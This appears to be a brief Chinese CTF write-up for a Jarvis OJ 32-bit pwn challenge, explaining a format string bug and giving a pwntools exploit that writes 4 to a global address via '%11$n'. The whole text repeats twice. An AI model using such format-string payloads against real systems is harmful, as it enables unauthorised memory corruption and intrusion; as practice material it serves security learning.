格式化字符串漏洞简单利用
32位程序。
canary和nx都打开了。
放ida里:
直接打印的buf,很明显的格式化字符串漏洞。
用%n,将其修改为4即可,exp如下:
from pwn import*
a=remote("pwn2.jarvisoj.com","9895")
payload=p32(0x0804A02C)+"%11$n"
a.sendline(payload)
a.interactive()
格式化字符串漏洞简单利用
32位程序。
canary和nx都打开了。
放ida里:
直接打印的buf,很明显的格式化字符串漏洞。
用%n,将其修改为4即可,exp如下:
from pwn import*
a=remote("pwn2.jarvisoj.com","9895")
payload=p32(0x0804A02C)+"%11$n"
a.sendline(payload)
a.interactive()